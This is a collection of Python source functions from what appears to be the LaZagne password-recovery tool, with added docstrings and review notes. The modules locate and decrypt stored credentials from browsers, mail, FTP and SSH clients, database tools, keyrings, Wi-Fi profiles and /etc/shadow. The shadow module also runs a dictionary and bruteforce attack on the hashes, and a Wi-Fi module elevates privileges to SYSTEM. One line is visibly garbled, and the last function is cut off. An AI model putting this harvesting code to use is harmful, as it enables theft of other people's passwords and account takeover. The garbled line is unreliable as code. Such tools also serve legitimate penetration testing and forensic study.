def retrieve_password(self):
    """Walk the Outlook profile registry tree and report password-like values.

    Opens the key named in keyPath (read-only access mask), enumerates two
    levels of subkeys, and for every value whose name contains "password"
    hands the containing subkey to self.retrieve_info(). Collected entries
    go to print_output(); nothing is returned.
    """
    # print title
    Header().title_debug('Outlook')
    # Read-only access mask: enumerate subkeys and query values, no write rights.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
    try:
        hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
    except:
        # Bare except: any failure (missing key, access denied, ...) is reported
        # as "not installed".
        print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath)
        return
    # RegQueryInfoKey(...)[0] is the subkey count; [1] is the value count.
    num = win32api.RegQueryInfoKey(hkey)[0]
    pwdFound = []
    for x in range(0, num):
        name = win32api.RegEnumKey(hkey, x)
        skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
        num_skey = win32api.RegQueryInfoKey(skey)[0]
        if num_skey != 0:
            for y in range(0, num_skey):
                name_skey = win32api.RegEnumKey(skey, y)
                sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                num_sskey = win32api.RegQueryInfoKey(sskey)[1]
                for z in range(0, num_sskey):
                    k = win32api.RegEnumValue(sskey, z)
                    # k is (value name, data, type); match on the name only.
                    if 'password' in k[0].lower():
                        values = self.retrieve_info(sskey, name_skey)
                        # write credentials into a text file
                        if len(values) != 0:
                            pwdFound.append(values)
    # NOTE(review): none of the opened key handles are closed explicitly here;
    # they are released only when the PyHKEY objects are garbage collected.
    # print the results
    print_output("Outlook", pwdFound)
def run(self): """ Main function """ # Print title title = "GitForWindows" Header().title_info(title) # According to the "git-credential-store" documentation: # Build a list of locations in which git credentials can be stored locations = [] locations.append(os.environ.get("USERPROFILE") + "\\.git-credentials") locations.append(os.environ.get("USERPROFILE") + "\\.config\\git\\credentials") if "XDG_CONFIG_HOME" in os.environ: locations.append(os.environ.get("XDG_CONFIG_HOME") + "\\git\\credentials") # Apply the password extraction on the defined locations pwd_found = [] for location in locations: pwd_found += self.extract_credentials(location) # Filter duplicates final_pwd_found = [] duplicates_track = [] for pwd in pwd_found: pwd_id = pwd["URL"] + pwd["Username"] + pwd["Password"] if pwd_id not in duplicates_track: final_pwd_found.append(pwd) duplicates_track.append(pwd_id) # Print the results print_output(title, final_pwd_found)
def read_file(self, filepath):
    """Parse an FTP Navigator site file and print the entries it contains.

    Each line is a ';'-separated list of key=value pairs; Name, Server, Port,
    User and Password are picked out. Password values '0' and '1' are treated
    as "not stored"; any other value is passed to self.decode().

    Args:
        filepath: path of the file to parse (opened read-only, never closed
            explicitly).
    """
    # NOTE(review): the handle is never closed; a `with` block would release it
    # deterministically.
    f = open(filepath, 'r')
    pwdFound = []
    for ff in f.readlines():
        values = {}
        info = ff.split(';')
        for i in info:
            # i becomes [key, value] — a field without '=' yields a one-element
            # list and i[1] would raise IndexError on a matching key.
            i = i.split('=')
            if i[0] == 'Name':
                values['Name'] = i[1]
            if i[0] == 'Server':
                values['Server'] = i[1]
            if i[0] == 'Port':
                values['Port'] = i[1]
            if i[0] == 'User':
                values['User'] = i[1]
            if i[0] == "Password":
                # '0' / '1' appear to be flags rather than stored passwords.
                if i[1] != '1' and i[1] != '0':
                    values['Password'] = self.decode(i[1])
        # used to save the password if it is an anonymous authentication
        # NOTE(review): values['User'] raises KeyError for a line with no User
        # field.
        if values['User'] == 'anonymous' and 'Password' not in values.keys():
            values['Password'] = '******'
        pwdFound.append(values)
    # print the results
    print_output('FTP Navigator', pwdFound)
def get_key_info(self):
    """Enumerate CoreFTP site profiles stored under HKCU and print them.

    Each subkey of the Sites key is one profile; Host, Port, User and PW
    values are read, and PW is passed to self.decrypt().

    Returns:
        False when the Sites key cannot be opened (any exception); None
        otherwise. Results are emitted through print_output(), not returned.
    """
    # Read-only access mask.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
    except:
        return False
    # [0] is the subkey count (one subkey per saved site).
    num_profiles = win32api.RegQueryInfoKey(key)[0]
    pwdFound = []
    for n in range(num_profiles):
        name_skey = win32api.RegEnumKey(key, n)
        skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
        # [1] is the value count within the site subkey.
        num = win32api.RegQueryInfoKey(skey)[1]
        values = {}
        for nn in range(num):
            k = win32api.RegEnumValue(skey, nn)
            if k[0] == 'Host':
                values['Host'] = k[1]
            if k[0] == 'Port':
                values['Port'] = k[1]
            if k[0] == 'User':
                values['User'] = k[1]
                # The dict is appended as soon as a User value is seen; later
                # values (e.g. PW) still land in it because it is the same object.
                pwdFound.append(values)
            if k[0] == 'PW':
                try:
                    values['Password'] = self.decrypt(k[1])
                except:
                    # Decryption failure is masked with a placeholder.
                    values['Password'] = '******'
    # print the results
    print_output('CoreFTP', pwdFound)
def run(self): Header().title_info('System account (from /etc/shadow)') # check root access if self.root_access(): if self.check_file_access(): shadowFile = open (self.filestr,'r') for line in shadowFile.readlines(): _hash = line.replace('\n', '') line = _hash.split(':') # check if a password is defined if not line[1] in [ 'x', '*','!' ]: user = line[0] cryptPwd = line[1] # save each hash non empty self.hash += _hash + '\n' # try dictionary and bruteforce attack self.attack(user, cryptPwd) values = {'Category' : 'Hash', 'Hash' : self.hash } self.pwdFound.append(values) # print the results print_output('System account (from /etc/shadow)', self.pwdFound)
def retrieve_password(self):
    """Read NetworkManager connection profiles and report their wireless sections.

    Every regular file under /etc/NetworkManager/system-connections is parsed
    with RawConfigParser; items of any section whose name contains
    'wireless' are copied into a dict keyed by SSID (the file name) and
    printed. Nothing is returned.
    """
    # print the title
    Header().title_debug('Wifi (from Network Manager)')
    directory = '/etc/NetworkManager/system-connections'
    if os.path.exists(directory):
        if os.getuid() != 0:
            # Only a hint: execution continues, and files the caller cannot
            # read are silently skipped by RawConfigParser.read().
            print_debug('INFO', 'You need more privileges (run it with sudo)\n')
        wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]
        pwdFound = []
        for w in wireless_ssid:
            cp = RawConfigParser()
            cp.read(os.path.join(directory, w))
            values = {}
            # The profile file name is used as the SSID label.
            values['SSID'] = w
            if cp.sections():
                for section in cp.sections():
                    if 'wireless' in section:
                        for i in cp.items(section):
                            values[i[0]] = i[1]
                # write credentials into a text file
                # values always holds 'SSID', so this check is always true.
                if len(values) != 0:
                    pwdFound.append(values)
        # print the results
        print_output('Wifi', pwdFound)
    else:
        print_debug('ERROR', 'the path "%s" does not exist' %(directory))
def run(self):
    """Report CRED_TYPE_DOMAIN_VISIBLE_PASSWORD entries from self.get_creds().

    For each matching credential the CredentialBlob is passed to
    self.Win32CryptUnprotectData() with self.get_entropy(); a result other
    than the string 'failed' is UTF-16 decoded and printed together with
    TargetName and UserName. Nothing is returned.
    """
    # print title
    Header().title_info('Dot Net Passport')
    a = self.get_creds()
    pwd = ''
    pwdFound = []
    if a:
        for i in a:
            values = {}
            if i['Type'] == win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
                cipher_text = i['CredentialBlob']
                pwd = self.Win32CryptUnprotectData(cipher_text, self.get_entropy())
                # The helper signals failure with the literal string 'failed'.
                if pwd != 'failed':
                    values['TargetName'] = i['TargetName']
                    if i['UserName'] is not None:
                        values['Username'] = i['UserName']
                    try:
                        values['Password'] = pwd.decode('utf16')
                    except Exception,e:
                        print_debug('DEBUG', '{0}'.format(e))
                        values['INFO'] = 'Error decoding the password'
                    pwdFound.append(values)
    # print the results
    print_output('Dot Net Passport', pwdFound)
def retrieve_password(self):
    """Read NetworkManager connection profiles and report their wireless sections.

    Same logic as the sibling Network Manager module: every regular file
    under /etc/NetworkManager/system-connections is parsed with
    RawConfigParser, items of sections whose name contains 'wireless' are
    collected under the file name as SSID, and the list is printed.
    """
    # print the title
    Header().title_debug('Wifi (from Network Manager)')
    directory = '/etc/NetworkManager/system-connections'
    if os.path.exists(directory):
        if os.getuid() != 0:
            # Advisory only; execution continues and unreadable files are
            # silently ignored by RawConfigParser.read().
            print_debug('INFO', 'You need more privileges (run it with sudo)\n')
        wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]
        pwdFound = []
        for w in wireless_ssid:
            cp = RawConfigParser()
            cp.read(os.path.join(directory, w))
            values = {}
            values['SSID'] = w
            if cp.sections():
                for section in cp.sections():
                    if 'wireless' in section:
                        for i in cp.items(section):
                            values[i[0]] = i[1]
                # write credentials into a text file
                # Always true: 'SSID' is set unconditionally above.
                if len(values) != 0:
                    pwdFound.append(values)
        # print the results
        print_output('Wifi', pwdFound)
    else:
        print_debug('WARNING', 'the path "%s" does not exist' %(directory))
def decipher_new_version(self, path):
    """Read the 'Login Data' SQLite store under *path* and print its logins.

    Rows of the logins table are unprotected with CryptUnprotectData (DPAPI,
    current-user scope); rows that yield an empty result are dropped.

    Args:
        path: directory expected to contain the 'Login Data' database.
    """
    database_path = path + os.sep + 'Login Data'
    if os.path.exists(database_path):
        # Connect to the Database
        # NOTE(review): the connection is never closed; the file stays open
        # until the object is collected.
        conn = sqlite3.connect(database_path)
        cursor = conn.cursor()
        # Get the results
        try:
            cursor.execute('SELECT action_url, username_value, password_value FROM logins')
        except Exception,e:
            # Any error (locked file, missing table, ...) is reported as "locked".
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !')
            return
        pwdFound = []
        for result in cursor.fetchall():
            values = {}
            # Decrypt the Password
            # CryptUnprotectData returns (description, data); [1] is the data.
            password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
            if password:
                values['Site'] = result[0]
                values['Username'] = result[1]
                values['Password'] = password
                pwdFound.append(values)
        # print the results
        print_output("Opera", pwdFound)
def parse_results(self, passwords):
    """Reassemble records from a flat list of strings using position counters.

    A date-like token (\\d+-\\d+-\\d+) starts a new record; the first two
    'http' tokens after it are counted, and the two tokens following the
    second URL are taken as User and Password. Prints the collected list.

    Args:
        passwords: sequence of strings in the order they were extracted.
    """
    cpt = 0
    values = {}
    pwdFound = []
    for password in passwords:
        # date (begin of the sensitive data)
        match=re.search(r'(\d+-\d+-\d+)', password)
        if match:
            values = {}
            cpt = 0
            tmp_cpt = 0
        # after finding 2 urls
        # NOTE(review): tmp_cpt is only initialised when a date token has been
        # seen; reaching this branch before that raises NameError.
        if cpt == 2:
            tmp_cpt += 1
            if tmp_cpt == 2:
                values['User'] = password
                # NOTE(review): the following line is not valid Python as shown;
                # the listing appears garbled/redacted at this point (it looks
                # like a debug print plus a values['Password'] assignment).
                # Kept verbatim — confirm against the original source.
                print 'User:'******'Password'] = password
        # url
        match=re.search(r'^http', password)
        if match:
            cpt +=1
            if cpt == 1:
                tmp_url = password
            elif cpt == 2:
                # Record is appended on the second URL, before User/Password
                # are filled in — they are added later to the same dict object.
                values['URL'] = tmp_url
                pwdFound.append(values)
    # print the results
    print_output("Opera", pwdFound)
def run(self):
    """Read the Kalypso Media Launcher ini file under APPDATA and print its login.

    The 'styx user' section supplies the login and a base64-encoded
    password, which is passed through self.xorstring() with a fixed key.
    A fixed key used this way provides obfuscation only, not confidentiality.
    """
    # print title
    Header().title_info('Kalypso Media Launcher')
    creds = []
    # Static key applied by self.xorstring(); identical for every installation.
    key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'
    if 'APPDATA' in os.environ:
        inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'
    else:
        print_debug('ERROR', 'The APPDATA environment variable is not defined.')
        return
    # The actual user details are stored in *.userdata files
    if not os.path.exists(inifile):
        print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
        return
    config = ConfigParser.ConfigParser()
    config.read(inifile)
    values = {}
    # NOTE(review): config.get() raises NoSectionError/NoOptionError when the
    # section or option is missing; neither is caught here.
    values['Login'] = config.get('styx user','login')
    # get the encoded password
    cookedpw = base64.b64decode(config.get('styx user','password'));
    values['Password'] = self.xorstring(cookedpw, key)
    creds.append(values)
    print_output("Kalypso Media Launcher", creds)
def run(self, historic=''):
    """Match IntelliForms Storage2 values against URL hashes and decipher them.

    Builds a hash table from an optional URL list file via
    self.get_hash_table(), then compares each value name under
    HKCU IntelliForms Storage2 (first 40 chars, lowercased) with those
    hashes; a match is handed to self.decipher_password().

    Args:
        historic: optional path to a text file with one URL per line.
    """
    # print title
    Header().title_debug('Internet Explorer')
    # write the binary file
    try:
        self.write_binary_file()
    except:
        # NOTE(review): dll_name is not defined in this method; presumably a
        # module-level name — confirm. The failure is logged but not fatal.
        print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)
    # NOTE(review): `list` shadows the builtin for the rest of the method.
    list = []
    if historic:
        if os.path.exists(historic):
            # Handle is never closed explicitly.
            f = open(historic, 'r')
            for line in f:
                list.append(line.strip())
        else:
            print_debug('WARNING', 'The text file %s does not exist' % historic)
    # retrieve the urls from the history
    # Expected shape, from the loop below: each entry is (url, hash) — confirm
    # against get_hash_table().
    hash_tables = self.get_hash_table(list)
    # open the registry
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    keyPath = 'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
    failed = False
    try:
        hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
    except:
        failed = True
    nb_site = 0
    nb_pass_found = 0
    if failed == False:
        # [1] is the value count.
        num = win32api.RegQueryInfoKey(hkey)[1]
        for x in range(0, num):
            k = win32api.RegEnumValue(hkey, x)
            if k:
                nb_site +=1
                for h in hash_tables:
                    # both hash are similar, we can decipher the password
                    if h[1] == k[0][:40].lower():
                        nb_pass_found += 1
                        cipher_text = k[1]
                        self.decipher_password(cipher_text, h[0])
                        break
        # print the results
        # NOTE(review): pwdFound is not defined in this method; presumably a
        # module-level list filled by decipher_password() — confirm.
        print_output("Internet Explorer", pwdFound)
        # manage errors
        if nb_site == 0:
            print_debug('INFO', 'No credentials stored in the IE browser.')
        elif nb_site > nb_pass_found:
            print_debug('ERROR', '%s hashes have not been decrypted, the associate website used to decrypt the passwords has not been found' % str(nb_site - nb_pass_found))
    else:
        print_debug('INFO', 'No password stored.\nThe registry key storing the ie password has not been found.\nKey: %s' % keyPath)
def get_infos(self, path, passphrase, salt):
    """Parse SQL Developer's connections.xml and print the connection entries.

    Locates the first 'o.jdeveloper.db.connection*' subdirectory of *path*,
    reads connections.xml from it, and maps elements by their addrType
    attribute. The 'password' value is passed to self.decrypt(salt, text,
    passphrase); a record is appended when the 'driver' element is reached.

    Args:
        path: SQL Developer system directory.
        passphrase: secret forwarded to self.decrypt().
        salt: salt forwarded to self.decrypt().
    """
    for p in os.listdir(path):
        if p.startswith('o.jdeveloper.db.connection'):
            path += os.sep + p
            break
    xml_file = path + os.sep + 'connections.xml'
    if os.path.exists(xml_file):
        tree = ET.ElementTree(file=xml_file)
        pwdFound = []
        # NOTE(review): a single dict is created once and never replaced, so
        # every entry appended below is the same object — later connections
        # overwrite the fields of earlier ones in the printed list.
        values = {}
        for elem in tree.iter():
            if 'addrType' in elem.attrib.keys():
                if elem.attrib['addrType'] == 'sid':
                    for e in elem.getchildren():
                        values['sid'] = e.text
                elif elem.attrib['addrType'] == 'port':
                    for e in elem.getchildren():
                        values['port'] = e.text
                elif elem.attrib['addrType'] == 'user':
                    for e in elem.getchildren():
                        values['user'] = e.text
                elif elem.attrib['addrType'] == 'ConnName':
                    for e in elem.getchildren():
                        values['Connection Name'] = e.text
                elif elem.attrib['addrType'] == 'customUrl':
                    for e in elem.getchildren():
                        values['custom Url'] = e.text
                elif elem.attrib['addrType'] == 'SavePassword':
                    for e in elem.getchildren():
                        values['SavePassword'] = e.text
                elif elem.attrib['addrType'] == 'hostname':
                    for e in elem.getchildren():
                        values['hostname'] = e.text
                elif elem.attrib['addrType'] == 'password':
                    for e in elem.getchildren():
                        pwd = self.decrypt(salt, e.text, passphrase)
                        values['password'] = pwd
                elif elem.attrib['addrType'] == 'driver':
                    for e in elem.getchildren():
                        values['driver'] = e.text
                    # password found
                    # 'driver' is treated as the last element of a connection.
                    pwdFound.append(values)
        # print the results
        print_output("SQL Developer", pwdFound)
    else:
        print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
def run(self):
    """List items of every unlocked GNOME keyring through the gnomekeyring module.

    Refuses to run as root (the keyring belongs to the desktop session user).
    For each item the display name, a fixed set of attributes and the secret
    are copied into a dict and printed. Any exception, including a missing
    gnomekeyring module, is caught and logged.
    """
    # print the title
    Header().title_debug('Gnome keyring')
    if os.getuid() == 0:
        print_debug('INFO', 'Do not run with root privileges)\n')
        return
    try:
        # Function-scope import: an ImportError is swallowed by the broad
        # except below and reported as a keyring error.
        import gnomekeyring
        if len(gnomekeyring.list_keyring_names_sync()) > 0:
            pwdFound = []
            for keyring in gnomekeyring.list_keyring_names_sync():
                # `id` shadows the builtin within this loop.
                for id in gnomekeyring.list_item_ids_sync(keyring):
                    values = {}
                    item = gnomekeyring.item_get_info_sync(keyring, id)
                    attr = gnomekeyring.item_get_attributes_sync( keyring, id)
                    if attr:
                        if item.get_display_name():
                            values["Item"] = item.get_display_name()
                        if attr.has_key('server'):
                            values["Server"] = attr['server']
                        if attr.has_key('protocol'):
                            values["Protocol"] = attr['protocol']
                        if attr.has_key('unique'):
                            values["Unique"] = attr['unique']
                        if attr.has_key('domain'):
                            values["Domain"] = attr['domain']
                        if attr.has_key('origin_url'):
                            values["Origin_url"] = attr['origin_url']
                        if attr.has_key('username_value'):
                            values["Username"] = attr['username_value']
                        # 'user' overrides 'username_value' when both exist.
                        if attr.has_key('user'):
                            values["Username"] = attr['user']
                        if item.get_secret():
                            values["Password"] = item.get_secret()
                        # write credentials into a text file
                        if len(values) != 0:
                            pwdFound.append(values)
            # print the results
            print_output('Gnome keyring', pwdFound)
        else:
            print_debug('WARNING', 'The Gnome Keyring wallet is empty')
    except Exception, e:
        print_debug( 'ERROR', 'An error occurs with the Gnome Keyring wallet: {0}'.format(e))
def run(self):
    """List items of every unlocked GNOME keyring through the gnomekeyring module.

    Same logic as the sibling Gnome keyring module (different title/log
    levels): refuses to run as root, copies display name, selected
    attributes and the secret of each item into a dict, prints the list,
    and logs any exception (including ImportError) instead of raising.
    """
    # print the title
    Header().title_info('Gnome keyring')
    if os.getuid() == 0:
        print_debug('WARNING', 'Do not run it with root privileges)\n')
        return
    try:
        # Function-scope import; ImportError ends up in the except below.
        import gnomekeyring
        if len(gnomekeyring.list_keyring_names_sync()) > 0:
            pwdFound = []
            for keyring in gnomekeyring.list_keyring_names_sync():
                # `id` shadows the builtin within this loop.
                for id in gnomekeyring.list_item_ids_sync(keyring):
                    values = {}
                    item = gnomekeyring.item_get_info_sync(keyring, id)
                    attr = gnomekeyring.item_get_attributes_sync(keyring, id)
                    if attr:
                        if item.get_display_name():
                            values["Item"] = item.get_display_name()
                        if attr.has_key('server'):
                            values["Server"] = attr['server']
                        if attr.has_key('protocol'):
                            values["Protocol"] = attr['protocol']
                        if attr.has_key('unique'):
                            values["Unique"] = attr['unique']
                        if attr.has_key('domain'):
                            values["Domain"] = attr['domain']
                        if attr.has_key('origin_url'):
                            values["Origin_url"] = attr['origin_url']
                        if attr.has_key('username_value'):
                            values["Username"] = attr['username_value']
                        # 'user' takes precedence over 'username_value'.
                        if attr.has_key('user'):
                            values["Username"] = attr['user']
                        if item.get_secret():
                            values["Password"] = item.get_secret()
                        # write credentials into a text file
                        if len(values) != 0:
                            pwdFound.append(values)
            # print the results
            print_output('Gnome keyring', pwdFound)
        else:
            print_debug('WARNING', 'The Gnome Keyring wallet is empty')
    except Exception,e:
        print_debug('ERROR', 'An error occurs with the Gnome Keyring wallet: {0}'.format(e))
def run(self):
    """Collect WLAN profile results written by an elevated helper to a temp file.

    Requires an elevated token (IsUserAnAdmin). Checks that the Wlansvc
    profile directory exists, calls get_system_priv(), then waits and reads
    an ini-style file at a fixed path in the temp directory, which is
    deleted after parsing. Nothing is returned.
    """
    # print title
    Header().title_info('Wifi')
    if not windll.Shell32.IsUserAnAdmin():
        print_debug('WARNING', '[!] This script should be run as admin!')
        return
    else:
        if 'ALLUSERSPROFILE' in os.environ:
            directory = os.environ['ALLUSERSPROFILE'] + os.sep + 'Microsoft\Wlansvc\Profiles\Interfaces'
        else:
            print_debug('ERROR', 'Environment variable (ALLUSERSPROFILE) has not been found.')
            return
        if not os.path.exists(directory):
            print_debug('INFO', 'No credentials found.\nFile containing passwords not found:\n%s' % directory)
            return
        try:
            print_debug('INFO', '[!] Trying to elevate our privilege')
            get_system_priv()
            print_debug('INFO', '[!] Elevation ok - Passwords decryption is in progress')
        except Exception,e:
            print_debug('DEBUG', '{0}'.format(e))
            # Not fatal: the code still waits for and reads the temp file below.
            print_debug('ERROR', '[!] An error occurs during the privilege elevation process. Wifi passwords have not been decrypted')
        # Fixed delays stand in for real synchronisation with the helper.
        time.sleep(5)
        # read temp file containing all passwords found
        pwdFound = []
        # NOTE(review): fixed, predictable file name in a shared temp directory
        # holding plaintext results; it is also the hand-off point with the
        # helper process, so its lifetime and permissions deserve attention.
        filepath = tempfile.gettempdir() + os.sep + 'TEMP123A.txt'
        # the file has not been created yet
        if not os.path.exists(filepath):
            time.sleep(5)
        if os.path.exists(filepath):
            cp = RawConfigParser()
            cp.read(filepath)
            for section in cp.sections():
                values = {}
                for c in cp.items(section):
                    values[str(c[0])] = str(c[1])
                pwdFound.append(values)
            # remove file on the temporary directory
            # Only reached on this branch; on the else branch nothing is left
            # behind because the file was never found.
            os.remove(filepath)
            # print the results
            print_output("Wifi", pwdFound)
        else:
            print_debug('INFO', 'No passwords found')
def run(self):
    """
    Main function:
    - For an encrypted password, report the encrypted form together with the
      master password so that the "LaZagne run initiator" can apply the
      encryption parameters matching the installed Maven version (those
      parameters can change between Maven versions).
    - The "LaZagne run initiator" can also use the encrypted password and the
      master password "AS IS" in a Maven distribution to access repositories.
    See https://github.com/jelmerk/maven-settings-decoder
    See https://github.com/sonatype/plexus-cipher/blob/master/src/main/java/org/sonatype/plexus/components/cipher/PBECipher.java
    """
    # Print title
    title = "MavenRepositories"
    Header().title_info(title)
    # Extract the master password
    master_password = self.extract_master_password()
    # Extract all available repositories credentials
    # Expected: a list of dicts with "id", "username" and either "password" or
    # "privateKey" (+ optional "passphrase") — see the key accesses below.
    repos_creds = self.extract_repositories_credentials()
    # Parse and process the list of repositories's credentials
    # 3 cases are handled:
    # => Authentication using password protected with the master password (encrypted)
    # => Authentication using password not protected with the master password (plain text)
    # => Authentication using private key
    pwd_found = []
    for creds in repos_creds:
        values = {}
        values["Id"] = creds["id"]
        values["Username"] = creds["username"]
        if not self.use_key_auth(creds):
            pwd = creds["password"].strip()
            # Case for authentication using password protected with the master password
            # Maven wraps encrypted values in braces: {...}
            if pwd.startswith("{") and pwd.endswith("}"):
                values["SymetricEncryptionKey"] = master_password
                values["PasswordEncrypted"] = pwd
            else:
                values["Password"] = pwd
        else:
            # Case for authentication using private key
            pk_file_location = creds["privateKey"]
            # NOTE(review): os.environ.get("USERPROFILE") is None when unset and
            # str.replace() then raises TypeError.
            pk_file_location = pk_file_location.replace("${user.home}", os.environ.get("USERPROFILE"))
            with open(pk_file_location, "r") as pk_file:
                values["PrivateKey"] = pk_file.read()
            if "passphrase" in creds:
                values["Passphrase"] = creds["passphrase"]
        pwd_found.append(values)
    # Print the results
    print_output(title, pwd_found)
def get_infos(self, path, passphrase, salt):
    """Parse DbVisualizer's config70/dbvis.xml and print one entry per Database.

    Alias, Userid, Password (via self.decrypt), Driver and the Server/Port/SID
    UrlVariables are read; each lookup is wrapped in a bare try/except so a
    missing element simply leaves the key out.

    Args:
        path: DbVisualizer settings directory.
        passphrase: secret forwarded to self.decrypt().
        salt: salt forwarded to self.decrypt().
    """
    # Hard-coded to the config70 layout.
    xml_file = path + os.sep + 'config70/dbvis.xml'
    if os.path.exists(xml_file):
        tree = ET.ElementTree(file=xml_file)
        pwdFound = []
        for e in tree.findall('Databases/Database'):
            values = {}
            try:
                values['Connection Name'] = e.find('Alias').text
            except:
                pass
            try:
                values['Userid'] = e.find('Userid').text
            except:
                pass
            try:
                ciphered_password = e.find('Password').text
                try:
                    password = self.decrypt(salt, ciphered_password, passphrase)
                    values['Password'] = password
                    # NOTE(review): passwordFound is assigned but never read here.
                    passwordFound = True
                except:
                    pass
            except:
                pass
            try:
                values['Driver'] = e.find('UrlVariables//Driver').text.strip()
            except:
                pass
            try:
                elem = e.find('UrlVariables')
                for ee in elem.getchildren():
                    for ele in ee.getchildren():
                        if 'Server' == ele.attrib['UrlVariableName']:
                            values['Server'] = str(ele.text)
                        if 'Port' == ele.attrib['UrlVariableName']:
                            values['Port'] = str(ele.text)
                        if 'SID' == ele.attrib['UrlVariableName']:
                            values['SID'] = str(ele.text)
            except:
                pass
            if len(values) > 0:
                pwdFound.append(values)
        # print the results
        print_output("DbVisualizer", pwdFound)
def get_infos(self, path, passphrase, salt):
    """Parse DbVisualizer's config70/dbvis.xml and print one entry per Database.

    Identical in behaviour to the single-quoted sibling: Alias, Userid,
    Password (via self.decrypt), Driver and Server/Port/SID UrlVariables are
    read under bare try/except blocks, so missing elements are skipped.

    Args:
        path: DbVisualizer settings directory.
        passphrase: secret forwarded to self.decrypt().
        salt: salt forwarded to self.decrypt().
    """
    # Hard-coded to the config70 layout.
    xml_file = path + os.sep + "config70/dbvis.xml"
    if os.path.exists(xml_file):
        tree = ET.ElementTree(file=xml_file)
        pwdFound = []
        for e in tree.findall("Databases/Database"):
            values = {}
            try:
                values["Connection Name"] = e.find("Alias").text
            except:
                pass
            try:
                values["Userid"] = e.find("Userid").text
            except:
                pass
            try:
                ciphered_password = e.find("Password").text
                try:
                    password = self.decrypt(salt, ciphered_password, passphrase)
                    values["Password"] = password
                    # NOTE(review): passwordFound is never read in this method.
                    passwordFound = True
                except:
                    pass
            except:
                pass
            try:
                values["Driver"] = e.find("UrlVariables//Driver").text.strip()
            except:
                pass
            try:
                elem = e.find("UrlVariables")
                for ee in elem.getchildren():
                    for ele in ee.getchildren():
                        if "Server" == ele.attrib["UrlVariableName"]:
                            values["Server"] = str(ele.text)
                        if "Port" == ele.attrib["UrlVariableName"]:
                            values["Port"] = str(ele.text)
                        if "SID" == ele.attrib["UrlVariableName"]:
                            values["SID"] = str(ele.text)
            except:
                pass
            if len(values) > 0:
                pwdFound.append(values)
        # print the results
        print_output("DbVisualizer", pwdFound)
def run(self):
    """Print wpa_supplicant entries parsed by self.parse_file().

    Aborts when self.check_file_access() is truthy (note: the shadow module
    proceeds on a truthy result — the two helpers may have opposite senses;
    confirm) or when not running as root.
    """
    Header().title_info('Wifi (from WPA Supplicant)')
    if self.check_file_access():
        return
    # check root access
    if os.getuid() != 0:
        print_debug('INFO', 'You need more privileges (run it with sudo)\n')
        return
    pwdFound = self.parse_file()
    print_output("wpa_supplicant", pwdFound)
def get_logins_info(self):
    """Enumerate WinSCP 2 sessions stored under HKCU and print them.

    HostName, UserName and Password values feed the instance setters;
    self.decrypt_password() then produces the password (placeholder on
    failure). PortNumber defaults to '22' when absent.

    Returns:
        False when the Sessions key cannot be opened; None otherwise.
    """
    # Read-only access mask.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        key = win32api.RegOpenKey( win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
    except:
        return False
    # [0] is the subkey count (one subkey per session).
    num_profiles = win32api.RegQueryInfoKey(key)[0]
    pwdFound = []
    for n in range(num_profiles):
        name_skey = win32api.RegEnumKey(key, n)
        skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
        # [1] is the value count within the session subkey.
        num = win32api.RegQueryInfoKey(skey)[1]
        port = ''
        values = {}
        # NOTE(review): hostname/username/hash live on the instance and are not
        # reset per session here, so a session lacking one of the values
        # inherits the previous session's — unless the setters clear it; confirm.
        for nn in range(num):
            k = win32api.RegEnumValue(skey, nn)
            if k[0] == 'HostName':
                self.set_hostname(k[1])
            if k[0] == 'UserName':
                self.set_username(k[1])
            if k[0] == 'Password':
                self.set_hash(k[1])
            if k[0] == 'PortNumber':
                port = str(k[1])
        if num != 0:
            if port == '':
                port = '22'
            try:
                password = self.decrypt_password()
            except:
                password = '******'
            values['Hostname'] = self.get_hostname()
            values['Port'] = port
            values['Username'] = self.get_username()
            values['Password'] = password
            pwdFound.append(values)
    # print the results
    print_output("WinSCP", pwdFound)
def retrieve_password(self):
    """Open Chrome's default-profile 'Login Data' SQLite store and print its logins.

    Builds the profile path from HOMEDRIVE/HOMEPATH, trying the two legacy
    layouts, then unprotects each password_value with CryptUnprotectData
    (DPAPI, current-user scope). Nothing is returned.
    """
    # print title
    Header().title_debug('Chrome')
    database_path = ''
    if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
        # NOTE(review): the original "Win7"/"XP" labels are swapped — the
        # "Local Settings\Application Data" layout is the XP profile layout and
        # "AppData\Local" is Vista and later.
        path_Win7 = os.environ.get('HOMEDRIVE') + os.sep + os.environ.get('HOMEPATH') + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data'
